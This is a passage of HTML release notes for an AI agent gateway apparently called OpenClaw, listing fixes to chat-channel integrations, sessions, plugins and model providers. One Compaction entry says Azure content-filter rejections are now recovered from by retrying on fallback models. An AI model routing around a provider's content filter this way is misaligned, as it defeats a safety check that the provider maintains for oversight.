<li>Slack/directory: make <code>openclaw directory peers/groups list --channel slack</code> prefer token-backed live readers and return the connected Slack account from <code>directory self</code>, so valid Slack tokens no longer produce empty directory CLI results. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4105363396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50776" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50776/hovercard" href="https://github.com/openclaw/openclaw/issues/50776">#50776</a>. Thanks @pjaillon.</li>
<li>Slack: keep assistant typing status, temporary typing reactions, and status reactions active for group/channel turns that use message-tool-only visible replies, while still suppressing automatic source replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367334076" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75877/hovercard" href="https://github.com/openclaw/openclaw/issues/75877">#75877</a>. Thanks @teosborne.</li>
<li>Slack: recover full inbound DM text from top-level rich-text blocks when Slack sends a shortened message preview, so long direct messages still reach the agent intact. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4147105482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55358" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55358/hovercard" href="https://github.com/openclaw/openclaw/issues/55358">#55358</a>. Thanks @tonyjwinter.</li>
<li>Replies: strip legacy <code>[TOOL_CALL]{tool =&gt; ..., args =&gt; ...}[/TOOL_CALL]</code> pseudo-call text from user-facing replies and flag it in tool-call diagnostics instead of showing raw tool syntax in channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4230337239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63610" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63610/hovercard" href="https://github.com/openclaw/openclaw/issues/63610">#63610</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</li>
<li>WhatsApp: close long-lived web sockets through Baileys <code>end(error)</code> before falling back to raw websocket close, so listener teardown runs Baileys cleanup instead of leaving zombie sockets. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116852446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52442" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52442/hovercard" href="https://github.com/openclaw/openclaw/issues/52442">#52442</a>. Thanks @essendigitalgroup-cyber.</li>
<li>Twitch/plugins: emit a flat JSON Schema for Twitch channel config so single-account and multi-account configs validate before runtime load, and add source-checkout diagnostics for missing pnpm workspace dependencies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/sessions: move hot transcript reads and mirror appends onto async bounded IO with serialized parent-linked writes, keeping large session histories from stalling Gateway requests and channel replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364571913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75656/hovercard" href="https://github.com/openclaw/openclaw/issues/75656">#75656</a>. Thanks @DerFlash.</li>
<li>macOS/Talk Mode: downmix multi-channel microphone buffers before handing them to Apple Speech across Push-to-Talk, Talk Mode, Voice Wake, and the wake-word tester, so pro audio interfaces no longer produce empty transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4054504623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42533" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42533/hovercard" href="https://github.com/openclaw/openclaw/issues/42533">#42533</a>. Thanks @jbuecker.</li>
<li>macOS/Talk Mode: subscribe native WebChat to active-session transcript updates and render external spoken user turns in the chat thread instead of only showing assistant replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359538657" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75155" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75155/hovercard" href="https://github.com/openclaw/openclaw/issues/75155">#75155</a>. Thanks @SledderBling.</li>
<li>macOS/Voice Wake: accept trigger-only phrases in the built-in Voice Wake test, matching the settings UI and runtime trigger-only path instead of requiring extra command text after the wake word. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245638367" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64986/hovercard" href="https://github.com/openclaw/openclaw/issues/64986">#64986</a>. Thanks @zoiks65.</li>
<li>Cron/TTS: run cron announce payloads through the normal TTS directive transform before outbound delivery, so scheduled <code>[[tts]]</code> replies generate voice payloads instead of leaking raw tags. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115170457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52125" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52125/hovercard" href="https://github.com/openclaw/openclaw/issues/52125">#52125</a>. Thanks @kenchen3000.</li>
<li>WhatsApp: save downloadable quoted image media from reply context as inbound media, so agents can inspect an image that a user replied to instead of only seeing <code>&lt;media:image&gt;</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4188698212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59174" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59174/hovercard" href="https://github.com/openclaw/openclaw/issues/59174">#59174</a>. Thanks @gaffner.</li>
<li>Sessions/store: stop persisting the runtime-only <code>skillsSnapshot.resolvedSkills</code> array inside each session entry, so <code>sessions.json</code> no longer carries a copy of every parsed <code>SKILL.md</code> body for every active session; <code>ensureSkillSnapshot</code> rehydrates the array from disk on cold resume so the embedded runner, the Claude CLI skills plugin, and the Claude live-session fingerprint all see populated skills, and legacy stores self-heal on the next save. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3913009724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11950/hovercard" href="https://github.com/openclaw/openclaw/issues/11950">#11950</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3883150285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6650" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/6650/hovercard" href="https://github.com/openclaw/openclaw/issues/6650">#6650</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3934112753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/15000" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/15000/hovercard" href="https://github.com/openclaw/openclaw/issues/15000">#15000</a>. Thanks @amoghasgekar.</li>
<li>Doctor/WhatsApp: warn when Linux crontabs still run the legacy <code>ensure-whatsapp.sh</code> health check, which can misreport <code>Gateway inactive</code> when cron lacks the systemd user-bus environment. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4199567980" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60204" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60204/hovercard" href="https://github.com/openclaw/openclaw/issues/60204">#60204</a>. Thanks @mySebbe.</li>
<li>Slack/setup: print the generated app manifest as plain JSON instead of embedding it inside the framed setup note, so it can be copied into Slack without deleting border characters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251790246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65751" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65751/hovercard" href="https://github.com/openclaw/openclaw/issues/65751">#65751</a>. Thanks @theDanielJLewis.</li>
<li>Channels/WhatsApp: route CLI logout through the live Gateway and stop runtime-backed listeners before channel removal, so removing a WhatsApp account does not leave the old socket replying until restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277177561" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67746" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67746/hovercard" href="https://github.com/openclaw/openclaw/issues/67746">#67746</a>. Thanks @123Mismail.</li>
<li>Voice Call/Twilio: honor TTS directive text and provider voice/model overrides during telephony synthesis, so <code>[[tts:...]]</code> tags are not spoken literally and voiceId overrides reach OpenAI/ElevenLabs calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175530255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58114/hovercard" href="https://github.com/openclaw/openclaw/issues/58114">#58114</a>. Thanks @legonhilltech-jpg.</li>
<li>Agents/session-locks: reclaim untracked current-process session locks with matching starttime during acquisition and startup cleanup, so Gateway restarts recover from self-owned orphan <code>.jsonl.lock</code> files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366526190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75805" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75805/hovercard" href="https://github.com/openclaw/openclaw/issues/75805">#75805</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093489842" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49603" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49603/hovercard" href="https://github.com/openclaw/openclaw/issues/49603">#49603</a>. Thanks @cdznho.</li>
<li>Agents/subagents: initialize built-in context engines before native <code>sessions_spawn</code> resolves spawn preparation, so cliBackend-only cold starts no longer fail with an unregistered <code>legacy</code> context engine. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339592375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73095/hovercard" href="https://github.com/openclaw/openclaw/issues/73095">#73095</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347197163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73904/hovercard" href="https://github.com/openclaw/openclaw/pull/73904">#73904</a>) Thanks @brokemac79.</li>
<li>Plugins/Bonjour: ship the ciao runtime dependency with packaged OpenClaw so fresh OCM envs can start default mDNS discovery without a missing-module failure. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/tools: scope reply plugin-tool discovery to manifest-declared tool owners and already-active matching tool entries, avoiding broad plugin runtime loading for narrow or core-only tool allowlists. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/replies: defer implicit image model discovery and keep OAuth auth-store adoption on persisted profiles during reply startup, cutting OCM MarCodex warm prep to sub-second in live checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/tools: enforce <code>contracts.tools</code> as the manifest ownership contract for plugin tool registration, rejecting undeclared runtime tool names and adding bundled plugin drift coverage. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/Codex: stop prompting message-tool-only source turns to finish with <code>NO_REPLY</code>, so quiet turns are represented by not calling the visible message tool instead of conflicting final-text instructions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Gateway/config: report failed backup restores as failed in logs and config observe audit records instead of marking them valid. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314005687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70515" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70515/hovercard" href="https://github.com/openclaw/openclaw/pull/70515">#70515</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</li>
<li>Compaction: use the active session model fallback chain for implicit summarization failures without persisting fallback model selection, so Azure content-filter 400s can recover. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245460651" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64960" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64960/hovercard" href="https://github.com/openclaw/openclaw/issues/64960">#64960</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352068136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74470/hovercard" href="https://github.com/openclaw/openclaw/pull/74470">#74470</a>) Thanks @jalehman and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</li>
<li>Gateway/config: allow <code>gateway config.patch</code> to update documented subagent thinking defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365780380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75764" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75764/hovercard" href="https://github.com/openclaw/openclaw/issues/75764">#75764</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366498289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75802" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75802/hovercard" href="https://github.com/openclaw/openclaw/pull/75802">#75802</a>) Thanks @kAIborg24.</li>
<li>Plugins/CLI: keep git plugin install paths credential-free, preserve existing git checkouts until replacement succeeds, honor duplicate npm install mode, and remove managed git repos on uninstall. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: redact authenticated git URLs from git install command failure details, so failed clone or checkout output cannot leak credentials during plugin installs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels/status reactions: remove stale non-terminal lifecycle reactions when a run reaches done or error, so Discord does not leave a permanent thinking emoji after completion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363092374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75458/hovercard" href="https://github.com/openclaw/openclaw/issues/75458">#75458</a>. Thanks @davelutztx.</li>
<li>Discord/doctor: migrate unsupported per-channel <code>agentId</code> entries under guild channel config into top-level <code>bindings[]</code> routes, so <code>openclaw doctor --fix</code> preserves the intended agent route instead of stripping it as an unknown key. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217423565" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62455" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62455/hovercard" href="https://github.com/openclaw/openclaw/issues/62455">#62455</a>. Thanks @lobster-biscuit.</li>
<li>Discord/DMs: set inbound direct-message <code>ctx.To</code> to the semantic <code>user:&lt;id&gt;</code> target while keeping delivery routed through the DM channel, so mirror and recovery paths do not treat DMs as channel conversations. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4282995155" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68126" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68126/hovercard" href="https://github.com/openclaw/openclaw/issues/68126">#68126</a>. Thanks @illuminate0623.</li>
<li>Discord/DMs: keep no-guild inbound messages on direct-message routing when Discord channel lookup is temporarily unavailable, preventing degraded DMs from forking into channel sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195831671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59817" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59817/hovercard" href="https://github.com/openclaw/openclaw/issues/59817">#59817</a>. Thanks @DooPeePey.</li>
<li>Discord: retry outbound API calls on HTTP 5xx, request-timeout, and transient transport failures instead of only Discord rate limits, reducing dropped cron and agent replies during short Discord or network outages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116577020" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52396" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52396/hovercard" href="https://github.com/openclaw/openclaw/issues/52396">#52396</a>. Thanks @sunshineo.</li>
<li>Discord: include Components v2 Text Display content from referenced replies and forwarded snapshots, so component-only messages still appear in reply context. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158079453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56228" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56228/hovercard" href="https://github.com/openclaw/openclaw/issues/56228">#56228</a>. Thanks @HollandDrive.</li>
<li>Discord: add configurable gateway READY timeouts for startup and runtime reconnects, so staggered multi-account setups can avoid false restart loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331372526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72273" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72273/hovercard" href="https://github.com/openclaw/openclaw/issues/72273">#72273</a>. Thanks @sergionsantos.</li>
<li>Discord: preserve native slash-command description localizations through command reconcile, so localized Discord descriptions no longer get overwritten by English defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161405333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56580" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56580/hovercard" href="https://github.com/openclaw/openclaw/issues/56580">#56580</a>. Thanks @mhseo93.</li>
<li>Discord: add configured outbound mention aliases so known <code>@Name</code> references can be rewritten to real Discord user mentions instead of relying only on the transient directory cache. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274166014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67587/hovercard" href="https://github.com/openclaw/openclaw/issues/67587">#67587</a>. Thanks @McoreD.</li>
<li>Discord: avoid startup REST amplification by skipping native command deploy retries after Discord rate limits and deriving the bot id from parseable bot tokens instead of requiring a <code>/users/@me</code> lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362306201" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75341" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75341/hovercard" href="https://github.com/openclaw/openclaw/issues/75341">#75341</a>. Thanks @PrinceOfEgypt.</li>
<li>Plugins/hooks: derive hook <code>ctx.channelId</code> from the conversation target instead of the provider name, so Discord and other channel plugins can keep per-channel state isolated. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4196584916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59881" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59881/hovercard" href="https://github.com/openclaw/openclaw/issues/59881">#59881</a>. Thanks @bradfreels.</li>
<li>Gateway/config: log config health-state write failures instead of silently hiding config observe-recovery write errors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</li>
<li>Diagnostics: reset stuck-session timers on reply, tool, status, block, and ACP progress events, and back off repeated <code>session.stuck</code> diagnostics while a session remains unchanged. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330206713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72010" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72010/hovercard" href="https://github.com/openclaw/openclaw/pull/72010">#72010</a>. Thanks @rubencu.</li>
<li>Gateway/agents: avoid rebuilding core tools for plugin-only allowlists and keep the full plugin registry cache warm across scoped plugin loads, reducing per-turn latency spikes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367404227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75882" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75882/hovercard" href="https://github.com/openclaw/openclaw/issues/75882">#75882</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367580317" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75907" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75907/hovercard" href="https://github.com/openclaw/openclaw/issues/75907">#75907</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367573379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75906" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75906/hovercard" href="https://github.com/openclaw/openclaw/issues/75906">#75906</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367498934" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75887" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75887/hovercard" href="https://github.com/openclaw/openclaw/issues/75887">#75887</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367081946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75851" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75851/hovercard" href="https://github.com/openclaw/openclaw/issues/75851">#75851</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367733132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75922" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75922/hovercard" href="https://github.com/openclaw/openclaw/pull/75922">#75922</a>) Thanks @obviyus.</li>
<li>Agents/failover: classify bare <code>status: internal server error</code> provider messages as retryable server errors so model fallback can rotate instead of stopping. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346697764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73844" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73844/hovercard" href="https://github.com/openclaw/openclaw/pull/73844">#73844</a>) Thanks @thesomewhatyou.</li>
<li>Gateway/startup: return the shared retryable startup-sidecars error for startup-gated control-plane RPCs such as sessions.create, sessions.send, sessions.abort, agent.wait, and tools.effective, so clients can retry early sidecar races. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368487370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76012" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76012/hovercard" href="https://github.com/openclaw/openclaw/pull/76012">#76012</a>) Thanks @scoootscooob.</li>
<li>Providers/Google: fix Gemini 2.5 Flash-Lite <code>reasoning: "minimal"</code> rejections by raising its thinking-budget floor to 512 while preserving the existing Gemini 2.5 Pro and Flash minimal presets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316577583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70629" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70629/hovercard" href="https://github.com/openclaw/openclaw/pull/70629">#70629</a>) Thanks @ericberic.</li>
<li>Agents/status: resolve <code>session_status(sessionKey="current")</code> for sparse channel-plugin sessions after literal current lookups miss, so Scope, Slack, Discord, and other plugin-driven agents avoid retrying through <code>Unknown sessionKey: current</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348384116" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74141" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74141/hovercard" href="https://github.com/openclaw/openclaw/issues/74141">#74141</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331560781" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72306" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72306/hovercard" href="https://github.com/openclaw/openclaw/pull/72306">#72306</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>.</li>
<li>Cron: retry recurring wake-now main-session jobs through temporary heartbeat busy skips before recording success, so queued cron events no longer appear as ok ghost runs while the main lane is still busy. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368042745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75964" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75964/hovercard" href="https://github.com/openclaw/openclaw/issues/75964">#75964</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369011338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76083" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76083/hovercard" href="https://github.com/openclaw/openclaw/pull/76083">#76083</a>) Thanks @kshetrajna12 and @xuruiray.</li>
<li>Providers/Google: keep Gemini thinking-signature-only stream chunks active during reasoning, so Gemini 3.1 Pro Preview replies no longer hit idle timeouts before visible text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368880968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76071" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76071/hovercard" href="https://github.com/openclaw/openclaw/issues/76071">#76071</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368997122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76080" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76080/hovercard" href="https://github.com/openclaw/openclaw/pull/76080">#76080</a>) Thanks @marcoschierhorn and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>CLI/skills: show per-agent model and command visibility in <code>openclaw skills check --agent</code>, and let doctor report or disable unavailable skills allowed for the default agent. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368251753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75983" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75983/hovercard" href="https://github.com/openclaw/openclaw/pull/75983">#75983</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Agents/runtime/tools: keep reply startup on Gateway metadata, manifest catalog rows, auth-store state, and plugin loader cache-key compatibility checks so scoped runtime registries, model allowlists, thinking metadata, media/PDF/generation tools, Comfy workflows, OpenAI Codex OAuth image generation, and image/video/music tool registration avoid broad provider/runtime loads while preserving explicit config and auth-backed providers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Discord: document canonical mention formatting in agent prompt hints and channel docs so outbound replies use <code>&lt;@USER_ID&gt;</code>, <code>&lt;#CHANNEL_ID&gt;</code>, and <code>&lt;@&amp;ROLE_ID&gt;</code> instead of legacy nickname mentions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359907332" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75173/hovercard" href="https://github.com/openclaw/openclaw/pull/75173">#75173</a>)</li>
